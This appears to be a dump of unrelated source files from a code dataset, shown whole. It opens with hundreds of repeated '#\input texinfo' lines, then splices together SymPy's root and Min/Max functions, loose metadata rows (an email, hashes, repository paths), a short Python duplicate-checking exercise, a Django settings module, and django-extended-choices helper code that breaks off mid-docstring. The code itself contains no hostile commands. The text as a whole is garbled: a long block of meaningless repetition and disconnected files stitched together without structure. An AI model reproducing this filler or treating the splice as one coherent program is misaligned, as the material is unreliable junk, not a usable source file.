#\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo 
#\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo 
#\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo 
#\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo 
#\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo from __future__ import print_function, division from sympy.core import S, C, sympify from sympy.core.add import Add from sympy.core.basic import Basic from sympy.core.containers import Tuple from sympy.core.numbers import Rational from sympy.core.operations import LatticeOp, ShortCircuit from sympy.core.function import Application, Lambda, ArgumentIndexError from sympy.core.expr import Expr from sympy.core.singleton import Singleton from sympy.core.rules import Transform from sympy.core.compatibility import as_int, with_metaclass, xrange from sympy.core.logic import fuzzy_and class IdentityFunction(with_metaclass(Singleton, Lambda)): """ The identity function Examples ======== >>> from sympy import Id, Symbol >>> x = Symbol('x') >>> Id(x) x """ __slots__ = [] nargs = 1 def __new__(cls): x = C.Dummy('x') #construct "by hand" to avoid infinite loop return Expr.__new__(cls, Tuple(x), x) Id = S.IdentityFunction ############################################################################### ############################# ROOT and SQUARE ROOT FUNCTION ################### ############################################################################### def sqrt(arg): """The square root function sqrt(x) -> Returns the principal square root of x. Examples ======== >>> from sympy import sqrt, Symbol >>> x = Symbol('x') >>> sqrt(x) sqrt(x) >>> sqrt(x)**2 x Note that sqrt(x**2) does not simplify to x. >>> sqrt(x**2) sqrt(x**2) This is because the two are not equal to each other in general. For example, consider x == -1: >>> from sympy import Eq >>> Eq(sqrt(x**2), x).subs(x, -1) False This is because sqrt computes the principal square root, so the square may put the argument in a different branch. 
This identity does hold if x is positive: >>> y = Symbol('y', positive=True) >>> sqrt(y**2) y You can force this simplification by using the powdenest() function with the force option set to True: >>> from sympy import powdenest >>> sqrt(x**2) sqrt(x**2) >>> powdenest(sqrt(x**2), force=True) x To get both branches of the square root you can use the RootOf function: >>> from sympy import RootOf >>> [ RootOf(x**2-3,i) for i in (0,1) ] [-sqrt(3), sqrt(3)] See Also ======== sympy.polys.rootoftools.RootOf, root, real_root References ========== * http://en.wikipedia.org/wiki/Square_root * http://en.wikipedia.org/wiki/Principal_value """ # arg = sympify(arg) is handled by Pow return C.Pow(arg, S.Half) def cbrt(arg): """This function computes the principial cube root of `arg`, so it's just a shortcut for `arg**Rational(1, 3)`. Examples ======== >>> from sympy import cbrt, Symbol >>> x = Symbol('x') >>> cbrt(x) x**(1/3) >>> cbrt(x)**3 x Note that cbrt(x**3) does not simplify to x. >>> cbrt(x**3) (x**3)**(1/3) This is because the two are not equal to each other in general. For example, consider `x == -1`: >>> from sympy import Eq >>> Eq(cbrt(x**3), x).subs(x, -1) False This is because cbrt computes the principal cube root, this identity does hold if `x` is positive: >>> y = Symbol('y', positive=True) >>> cbrt(y**3) y See Also ======== sympy.polys.rootoftools.RootOf, root, real_root References ========== * http://en.wikipedia.org/wiki/Cube_root * http://en.wikipedia.org/wiki/Principal_value """ return C.Pow(arg, C.Rational(1, 3)) def root(arg, n): """The n-th root function (a shortcut for ``arg**(1/n)``) root(x, n) -> Returns the principal n-th root of x. Examples ======== >>> from sympy import root, Rational >>> from sympy.abc import x, n >>> root(x, 2) sqrt(x) >>> root(x, 3) x**(1/3) >>> root(x, n) x**(1/n) >>> root(x, -Rational(2, 3)) x**(-3/2) To get all n n-th roots you can use the RootOf function. 
The following examples show the roots of unity for n equal 2, 3 and 4: >>> from sympy import RootOf, I >>> [ RootOf(x**2-1,i) for i in (0,1) ] [-1, 1] >>> [ RootOf(x**3-1,i) for i in (0,1,2) ] [1, -1/2 - sqrt(3)*I/2, -1/2 + sqrt(3)*I/2] >>> [ RootOf(x**4-1,i) for i in (0,1,2,3) ] [-1, 1, -I, I] SymPy, like other symbolic algebra systems, returns the complex root of negative numbers. This is the principal root and differs from the text-book result that one might be expecting. For example, the cube root of -8 does not come back as -2: >>> root(-8, 3) 2*(-1)**(1/3) The real_root function can be used to either make such a result real or simply return the real root in the first place: >>> from sympy import real_root >>> real_root(_) -2 >>> real_root(-32, 5) -2 See Also ======== sympy.polys.rootoftools.RootOf sympy.core.power.integer_nthroot sqrt, real_root References ========== * http://en.wikipedia.org/wiki/Square_root * http://en.wikipedia.org/wiki/real_root * http://en.wikipedia.org/wiki/Root_of_unity * http://en.wikipedia.org/wiki/Principal_value * http://mathworld.wolfram.com/CubeRoot.html """ n = sympify(n) return C.Pow(arg, 1/n) def real_root(arg, n=None): """Return the real nth-root of arg if possible. If n is omitted then all instances of -1**(1/odd) will be changed to -1. 
Examples ======== >>> from sympy import root, real_root, Rational >>> from sympy.abc import x, n >>> real_root(-8, 3) -2 >>> root(-8, 3) 2*(-1)**(1/3) >>> real_root(_) -2 See Also ======== sympy.polys.rootoftools.RootOf sympy.core.power.integer_nthroot root, sqrt """ if n is not None: n = as_int(n) rv = C.Pow(arg, Rational(1, n)) if n % 2 == 0: return rv else: rv = sympify(arg) n1pow = Transform(lambda x: S.NegativeOne, lambda x: x.is_Pow and x.base is S.NegativeOne and x.exp.is_Rational and x.exp.p == 1 and x.exp.q % 2) return rv.xreplace(n1pow) ############################################################################### ############################# MINIMUM and MAXIMUM ############################# ############################################################################### class MinMaxBase(Expr, LatticeOp): def __new__(cls, *args, **assumptions): if not args: raise ValueError("The Max/Min functions must have arguments.") args = (sympify(arg) for arg in args) # first standard filter, for cls.zero and cls.identity # also reshape Max(a, Max(b, c)) to Max(a, b, c) try: _args = frozenset(cls._new_args_filter(args)) except ShortCircuit: return cls.zero # second filter # variant I: remove ones which can be removed # args = cls._collapse_arguments(set(_args), **assumptions) # variant II: find local zeros args = cls._find_localzeros(set(_args), **assumptions) _args = frozenset(args) if not _args: return cls.identity elif len(_args) == 1: return set(_args).pop() else: # base creation obj = Expr.__new__(cls, _args, **assumptions) obj._argset = _args return obj @classmethod def _new_args_filter(cls, arg_sequence): """ Generator filtering args. first standard filter, for cls.zero and cls.identity. 
Also reshape Max(a, Max(b, c)) to Max(a, b, c), and check arguments for comparability """ for arg in arg_sequence: # pre-filter, checking comparability of arguments if (arg.is_real is False) or (arg is S.ComplexInfinity): raise ValueError("The argument '%s' is not comparable." % arg) if arg == cls.zero: raise ShortCircuit(arg) elif arg == cls.identity: continue elif arg.func == cls: for x in arg.iter_basic_args(): yield x else: yield arg @classmethod def _find_localzeros(cls, values, **options): """ Sequentially allocate values to localzeros. When a value is identified as being more extreme than another member it replaces that member; if this is never true, then the value is simply appended to the localzeros. """ localzeros = set() for v in values: is_newzero = True localzeros_ = list(localzeros) for z in localzeros_: if id(v) == id(z): is_newzero = False elif cls._is_connected(v, z): is_newzero = False if cls._is_asneeded(v, z): localzeros.remove(z) localzeros.update([v]) if is_newzero: localzeros.update([v]) return localzeros @classmethod def _is_connected(cls, x, y): """ Check if x and y are connected somehow. """ if (x == y) or isinstance(x > y, bool) or isinstance(x < y, bool): return True if x.is_Number and y.is_Number: return True return False @classmethod def _is_asneeded(cls, x, y): """ Check if x and y satisfy relation condition. The relation condition for Max function is x > y, for Min function is x < y. They are defined in children Max and Min classes through the method _rel(cls, x, y) """ if (x == y): return False if x.is_Number and y.is_Number: if cls._rel(x, y): return True xy = cls._rel(x, y) if isinstance(xy, bool): if xy: return True return False yx = cls._rel_inversed(x, y) if isinstance(yx, bool): if yx: return False # never occurs? 
return True return False def _eval_derivative(self, s): # f(x).diff(s) -> x.diff(s) * f.fdiff(1)(s) i = 0 l = [] for a in self.args: i += 1 da = a.diff(s) if da is S.Zero: continue try: df = self.fdiff(i) except ArgumentIndexError: df = Function.fdiff(self, i) l.append(df * da) return Add(*l) @property def is_real(self): return fuzzy_and(arg.is_real for arg in self.args) class Max(MinMaxBase, Application): """ Return, if possible, the maximum value of the list. When number of arguments is equal one, then return this argument. When number of arguments is equal two, then return, if possible, the value from (a, b) that is >= the other. In common case, when the length of list greater than 2, the task is more complicated. Return only the arguments, which are greater than others, if it is possible to determine directional relation. If is not possible to determine such a relation, return a partially evaluated result. Assumptions are used to make the decision too. Also, only comparable arguments are permitted. Examples ======== >>> from sympy import Max, Symbol, oo >>> from sympy.abc import x, y >>> p = Symbol('p', positive=True) >>> n = Symbol('n', negative=True) >>> Max(x, -2) #doctest: +SKIP Max(x, -2) >>> Max(x, -2).subs(x, 3) 3 >>> Max(p, -2) p >>> Max(x, y) #doctest: +SKIP Max(x, y) >>> Max(x, y) == Max(y, x) True >>> Max(x, Max(y, z)) #doctest: +SKIP Max(x, y, z) >>> Max(n, 8, p, 7, -oo) #doctest: +SKIP Max(8, p) >>> Max (1, x, oo) oo Algorithm The task can be considered as searching of supremums in the directed complete partial orders [1]_. The source values are sequentially allocated by the isolated subsets in which supremums are searched and result as Max arguments. If the resulted supremum is single, then it is returned. The isolated subsets are the sets of values which are only the comparable with each other in the current set. E.g. natural numbers are comparable with each other, but not comparable with the `x` symbol. 
Another example: the symbol `x` with negative assumption is comparable with a natural number. Also there are "least" elements, which are comparable with all others, and have a zero property (maximum or minimum for all elements). E.g. `oo`. In case of it the allocation operation is terminated and only this value is returned. Assumption: - if A > B > C then A > C - if A==B then B can be removed References ========== .. [1] http://en.wikipedia.org/wiki/Directed_complete_partial_order .. [2] http://en.wikipedia.org/wiki/Lattice_%28order%29 See Also ======== Min : find minimum values """ zero = S.Infinity identity = S.NegativeInfinity @classmethod def _rel(cls, x, y): """ Check if x > y. """ return (x > y) @classmethod def _rel_inversed(cls, x, y): """ Check if x < y. """ return (x < y) def fdiff( self, argindex ): from sympy.functions.special.delta_functions import Heaviside n = len(self.args) if 0 < argindex and argindex <= n: argindex -= 1 if n == 2: return Heaviside( self.args[argindex] - self.args[1-argindex] ) newargs = tuple([self.args[i] for i in xrange(n) if i != argindex]) return Heaviside( self.args[argindex] - Max(*newargs) ) else: raise ArgumentIndexError(self, argindex) class Min(MinMaxBase, Application): """ Return, if possible, the minimum value of the list. Examples ======== >>> from sympy import Min, Symbol, oo >>> from sympy.abc import x, y >>> p = Symbol('p', positive=True) >>> n = Symbol('n', negative=True) >>> Min(x, -2) #doctest: +SKIP Min(x, -2) >>> Min(x, -2).subs(x, 3) -2 >>> Min(p, -3) -3 >>> Min(x, y) #doctest: +SKIP Min(x, y) >>> Min(n, 8, p, -7, p, oo) #doctest: +SKIP Min(n, -7) See Also ======== Max : find maximum values """ zero = S.NegativeInfinity identity = S.Infinity @classmethod def _rel(cls, x, y): """ Check if x < y. """ return (x < y) @classmethod def _rel_inversed(cls, x, y): """ Check if x > y. 
""" return (x > y) def fdiff( self, argindex ): from sympy.functions.special.delta_functions import Heaviside n = len(self.args) if 0 < argindex and argindex <= n: argindex -= 1 if n == 2: return Heaviside( self.args[1-argindex] - self.args[argindex] ) newargs = tuple([ self.args[i] for i in xrange(n) if i != argindex]) return Heaviside( Min(*newargs) - self.args[argindex] ) else: raise ArgumentIndexError(self, argindex)
[ "ryanmeyersweb@gmail.com" ]
ryanmeyersweb@gmail.com
8e3884896f59a39e13d0286dd45828194ff0cc9f
c5746efe18a5406764c041d149d89c0e0564c5a5
/1. Python语言核心编程/1. Python核心/Day07/exercise/exercise02.py
32cc7fbbb5ffb79abbadf328b32b5dc4fe0f60f2
[]
no_license
ShaoxiongYuan/PycharmProjects
fc7d9eeaf833d3711211cd2fafb81dd277d4e4a3
5111d4c0a7644c246f96e2d038c1a10b0648e4bf
refs/heads/master
2021-12-15T05:45:42.117000
2021-11-23T06:45:16
2021-11-23T06:45:16
241,294,858
3
1
null
2021-02-20T15:29:07
2020-02-18T07:06:08
Jupyter Notebook
UTF-8
Python
false
false
528
py
def if_same_element(target_list):
    """Return True if *target_list* contains at least two equal elements.

    Comparison uses ``==`` via the ``in`` operator, so elements do not
    need to be hashable (lists, dicts, ... all work).

    :param target_list: list to inspect
    :return: True if any element occurs more than once, else False
    """
    for index, item in enumerate(target_list):
        # Scan only the remainder of the list: an earlier duplicate pair
        # would already have been detected at its first occurrence.
        if item in target_list[index + 1:]:
            return True
    return False


if __name__ == '__main__':
    # Demo guarded so importing this module has no side effects.
    list1 = [34, 8, 56, 9, 8, 9]
    print(if_same_element(list1))
[ "ysxstevenpp123@gmail.com" ]
ysxstevenpp123@gmail.com
853c926761dfcdcbcd017ed1b743532f010314aa
9e55f933b1228d50597b3ee723881674b8c25adf
/store_backend/config/settings/common.py
fd2c0b762d042217d8b942c8c0c2fb4bba89c152
[ "MIT" ]
permissive
rudolphpienaar/ChRIS_store
e77abdcc892bb5066d697add5673f1c9e198fa4f
db924ded8e3323bc77b5eb974516df1d70cdd4d4
refs/heads/master
2020-03-06T21:41:59.060552
2019-11-14T02:43:31
2019-11-14T02:43:31
127,084,343
0
0
null
2018-03-28T04:37:25
2018-03-28T04:37:24
null
UTF-8
Python
false
false
4,016
py
# -*- coding: utf-8 -*-
"""
Django settings for chris_backend project.

Generated by 'django-admin startproject' using Django 1.9.5.

For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""

import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/

# NOTE(review): '*' accepts any Host header. Presumably the
# environment-specific settings module that imports this "common" one
# narrows it for production -- confirm.
ALLOWED_HOSTS = ['*']


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django_filters',
    'mod_wsgi.server',
    'rest_framework',
    'rest_framework.authtoken',
    'corsheaders',
    'collectionjson',
    # Project apps.
    'plugins',
    'pipelines',
    'users'
]

# Pagination
# Django REST Framework defaults: renderers/parsers include the
# Collection+JSON hypermedia format in addition to plain JSON; auth
# accepts token, HTTP basic and session credentials.
REST_FRAMEWORK = {
    'PAGE_SIZE': 10,
    'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
    'DEFAULT_RENDERER_CLASSES': (
        'collectionjson.renderers.CollectionJsonRenderer',
        'rest_framework.renderers.JSONRenderer',
        'rest_framework.renderers.BrowsableAPIRenderer',
    ),
    'DEFAULT_PARSER_CLASSES': (
        'collectionjson.parsers.CollectionJsonParser',
        'rest_framework.parsers.JSONParser',
        'rest_framework.parsers.FormParser',
        'rest_framework.parsers.MultiPartParser',
    ),
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'rest_framework.authentication.TokenAuthentication',
        'rest_framework.authentication.BasicAuthentication',
        'rest_framework.authentication.SessionAuthentication',
    ),
    'DEFAULT_FILTER_BACKENDS': (
        'django_filters.rest_framework.DjangoFilterBackend',
    )
}

# Order matters: core.middleware.ResponseMiddleware and the CORS
# middleware run before Django's stock middleware stack.
MIDDLEWARE = [
    'core.middleware.ResponseMiddleware',
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'config.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'config.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases

# NOTE(review): only ENGINE is set here -- NAME/USER/PASSWORD/HOST are
# presumably supplied by the environment-specific settings module that
# extends this file; verify against local.py/production.py.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
    }
}


# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'America/New_York'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/

STATIC_URL = '/static/'
[ "jbernal0019@yahoo.es" ]
jbernal0019@yahoo.es
fefdc0b44aed4811b72cf261766d16d88f7f1353
1bd3076902117867ec048210905195ba2aaaaa6b
/exercise/leetcode/python_src/by2017_Sep/Leet395.py
b0a38ca7d29434c505c9378e24dcca7f581c9b1f
[]
no_license
SS4G/AlgorithmTraining
d75987929f1f86cd5735bc146e86b76c7747a1ab
7a1c3aba65f338f6e11afd2864dabd2b26142b6c
refs/heads/master
2021-01-17T20:54:31.120884
2020-06-03T15:04:10
2020-06-03T15:04:10
84,150,587
2
0
null
2017-10-19T11:50:38
2017-03-07T03:33:04
Python
UTF-8
Python
false
false
1,068
py
class Solution(object):
    def longestSubstring(self, s, k):
        """
        :type s: str
        :type k: int
        :rtype: int
        """
        # An empty string has no qualifying substring.
        if not s:
            return 0
        return self.divideRecursive(s, k)

    def divideRecursive(self, s, k):
        # Count how often each character occurs in this segment.
        counts = {}
        for ch in s:
            counts[ch] = counts.get(ch, 0) + 1
        # If every character already appears at least k times, the whole
        # segment is a valid answer.
        if all(counts[ch] >= k for ch in s):
            return len(s)
        # Characters rarer than k can never belong to a valid substring,
        # so they act as separators; recurse on the pieces between them.
        best = 0
        start = 0
        for pos, ch in enumerate(s):
            if counts[ch] < k:
                if pos > start:
                    best = max(best, self.divideRecursive(s[start:pos], k))
                start = pos + 1
        if start < len(s):
            best = max(best, self.divideRecursive(s[start:], k))
        return best


if __name__ == "__main__":
    solver = Solution()
    print(solver.longestSubstring("ababbc", 2))
[ "ziheng_song@126.com" ]
ziheng_song@126.com
738462812ea73a23745bc0c307d24cb2fdd2bd41
677189954b8efda10f743a22a5758707ee0d6862
/extended_choices/helpers.py
c4f69af697b712b73afb3702ae804bd9278885e2
[ "BSD-3-Clause" ]
permissive
areski/django-extended-choices
5526aa43f2d562ac95be2db5e2f18d8352d5021e
ec7f8b23509174623e04a1c1d0d3832bd4c0d7fe
refs/heads/master
2021-01-21T03:16:07.006461
2015-10-14T21:20:06
2015-10-14T21:20:06
47,980,892
0
0
null
2015-12-14T14:45:50
2015-12-14T14:45:50
null
UTF-8
Python
false
false
10,205
py
"""Provides classes used to construct a full ``Choices`` instance. Notes ----- The documentation format in this file is numpydoc_. .. _numpydoc: https://github.com/numpy/numpy/blob/master/doc/HOWTO_DOCUMENT.rst.txt """ from __future__ import unicode_literals from builtins import object try: import cPickle as pickle except ImportError: import pickle from django.utils.functional import Promise class ChoiceAttributeMixin(object): """Base class to represent an attribute of a ``ChoiceEntry``. Used for ``constant``, ``name``, and ``display``. It must be used as a mixin with another type, and the final class will be a type with added attributes to access the ``ChoiceEntry`` instance and its attributes. Attributes ---------- choice_entry : instance of ``ChoiceEntry`` The ``ChoiceEntry`` instance that hold the current value, used to access its constant, value and display name. constant : property Returns the choice field holding the constant of the attached ``ChoiceEntry``. value : property Returns the choice field holding the value of the attached ``ChoiceEntry``. display : property Returns the choice field holding the display name of the attached ``ChoiceEntry``. original_type : type (class attribute) The class of the value used to create a new class. creator_type : type The class that created a new class. Will be ``ChoiceAttributeMixin`` except if it was overridden by the author. Example ------- Classes can be created manually: >>> class IntChoiceAttribute(ChoiceAttributeMixin, int): pass >>> field = IntChoiceAttribute(1, ChoiceEntry(('FOO', 1, 'foo'))) >>> field 1 >>> field.constant, field.value, field.display (u'FOO', 1, u'foo') >>> field.choice_entry (u'FOO', 1, u'foo') Or via the ``get_class_for_value`` class method: >>> klass = ChoiceAttributeMixin.get_class_for_value(1.5) >>> klass.__name__ 'FloatChoiceAttribute' >>> float in klass.mro() True """ def __new__(cls, *args, **kwargs): """Construct the object (the other class used with this mixin). 
Notes ----- Only passes the very first argument to the ``super`` constructor. All others are not needed for the other class, only for this mixin. """ if issubclass(cls, Promise): # Special case to manage lazy django stuff like ugettext_lazy return super(ChoiceAttributeMixin, cls).__new__(cls) return super(ChoiceAttributeMixin, cls).__new__(cls, *args[:1]) def __init__(self, value, choice_entry): """Initiate the object to save the value and the choice entry. Parameters ---------- value : ? Value to pass to the ``super`` constructor (for the other class using this mixin) choice_entry: ChoiceEntry The ``ChoiceEntry`` instance that hold the current value, used to access its constant, value and display name. Notes ----- Call the ``super`` constructor with only the first value, as the other class doesn't expect the ``choice_entry`` parameter. """ if isinstance(self, Promise): # Special case to manage lazy django stuff like ugettext_lazy super(ChoiceAttributeMixin, self).__init__(value._proxy____args, value._proxy____kw) else: super(ChoiceAttributeMixin, self).__init__() self.choice_entry = choice_entry @property def constant(self): """Property that returns the ``constant`` attribute of the attached ``ChoiceEntry``.""" return self.choice_entry.constant @property def value(self): """Property that returns the ``value`` attribute of the attached ``ChoiceEntry``.""" return self.choice_entry.value @property def display(self): """Property that returns the ``display`` attribute of the attached ``ChoiceEntry``.""" return self.choice_entry.display @property def original_value(self): """Return the original value used to create the current instance.""" return self.original_type(self) @classmethod def get_class_for_value(cls, value): """Class method to construct a class based on this mixin and the type of the given value. Parameters ---------- value: ? The value from which to extract the type to create the new class. 
Notes ----- The create classes are cached (in ``cls.__classes_by_type``) to avoid recreating already created classes. """ type_ = value.__class__ # Check if the type is already a ``ChoiceAttribute`` if issubclass(type_, ChoiceAttributeMixin): # In this case we can return this type return type_ # Create a new class only if it wasn't already created for this type. if type_ not in cls._classes_by_type: # Compute the name of the class with the name of the type. class_name = str('%sChoiceAttribute' % type_.__name__.capitalize()) # Create a new class and save it in the cache. cls._classes_by_type[type_] = type(class_name, (cls, type_), { 'original_type': type_, 'creator_type': cls, }) # Return the class from the cache based on the type. return cls._classes_by_type[type_] def __reduce__(self): """Reducer to make the auto-created classes picklable. Returns ------- tuple A tuple as expected by pickle, to recreate the object when calling ``pickle.loads``: 1. a callable to recreate the object 2. a tuple with all positioned arguments expected by this callable """ return ( # Function to create a choice attribute create_choice_attribute, ( # The class that created the class of the current value self.creator_type, # The original type of the current value self.original_value, # The tied `choice_entry` self.choice_entry ) ) _classes_by_type = {} def create_choice_attribute(creator_type, value, choice_entry): """Create an instance of a subclass of ChoiceAttributeMixin for the given value. Parameters ---------- creator_type : type ``ChoiceAttributeMixin`` or a subclass, from which we'll call the ``get_class_for_value`` class-method. value : ? The value for which we want to create an instance of a new subclass of 